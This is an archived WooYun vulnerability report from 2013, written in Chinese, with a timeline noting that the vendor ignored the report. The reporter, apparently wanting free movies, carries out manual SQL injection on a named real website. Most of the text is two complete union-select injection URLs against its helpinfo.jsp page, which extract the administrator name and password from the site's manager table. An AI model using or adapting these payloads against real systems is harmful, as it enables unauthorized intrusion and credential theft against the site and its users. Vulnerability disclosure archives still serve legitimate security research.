乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-08-21: 积极联系厂商并且等待厂商认领中,细节不对外公开 2013-10-05: 厂商已经主动忽略漏洞,细节向公众公开
想看电影。试试手工注入
http://www.zyhyhq.com/helpinfo.jsp?id=999999.9%27+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28manager.name+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60zyhyhq%60.manager+Order+by+id+limit+0%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536+and+%27x%27%3D%27x
admin账号显示
http://www.zyhyhq.com/helpinfo.jsp?id=999999.9%27+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28manager.pwd+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60zyhyhq%60.manager+Order+by+id+limit+0%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536+and+%27x%27%3D%27x
密码出现
想去看电影。
未能联系到厂商或者厂商积极拒绝
